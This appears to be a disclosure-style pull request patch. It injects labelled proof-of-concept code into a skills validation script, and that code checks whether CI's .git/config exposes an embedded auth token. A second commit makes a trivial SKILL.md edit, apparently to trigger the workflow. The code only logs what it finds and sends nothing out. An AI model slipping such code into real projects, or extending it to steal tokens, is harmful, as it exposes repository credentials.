From c8a8325e22ccc9c73616f24a77b86022789044b1 Mon Sep 17 00:00:00 2001 From: nigel77775 <37985214+nigel77775@users.noreply.github.com> Date: Mon, 13 Jul 2026 21:30:17 +0300 Subject: [PATCH 1/2] Update validate-skills.mjs --- scripts/validate-skills.mjs | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/scripts/validate-skills.mjs b/scripts/validate-skills.mjs index 1a61a8a..7838906 100644 --- a/scripts/validate-skills.mjs +++ b/scripts/validate-skills.mjs @@ -1,6 +1,21 @@ #!/usr/bin/env node import fs from "node:fs"; import path from "node:path"; +//POC +import { existsSync, readFileSync } from 'node:fs'; + +console.log('=== PoC: fork-controlled script executing with working-directory=pr ==='); +console.log('cwd:', process.cwd()); +const gitConfigPath = '.git/config'; +if (existsSync(gitConfigPath)) { + const cfg = readFileSync(gitConfigPath, 'utf8'); + console.log('.git/config exists, length:', cfg.length, 'bytes'); + console.log('contains embedded auth token (extraheader):', cfg.includes('extraheader')); +} else { + console.log('.git/config not found'); +} +console.log('=== end PoC recon — original script continues below ==='); +//POC const REPO_ROOT = process.cwd(); const SKILLS_ROOT = REPO_ROOT; From 549a2d6c36af710ca366c1f04a631a8f09ba8046 Mon Sep 17 00:00:00 2001 From: nigel77775 <37985214+nigel77775@users.noreply.github.com> Date: Mon, 13 Jul 2026 21:35:43 +0300 Subject: [PATCH 2/2] Update SKILL.md --- code-review/SKILL.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/code-review/SKILL.md b/code-review/SKILL.md index 6892e36..40dee46 100644 --- a/code-review/SKILL.md +++ b/code-review/SKILL.md @@ -8,7 +8,7 @@ tags: - quality - review --- - +# Test # Code Review Checklist When reviewing code, check each of these areas: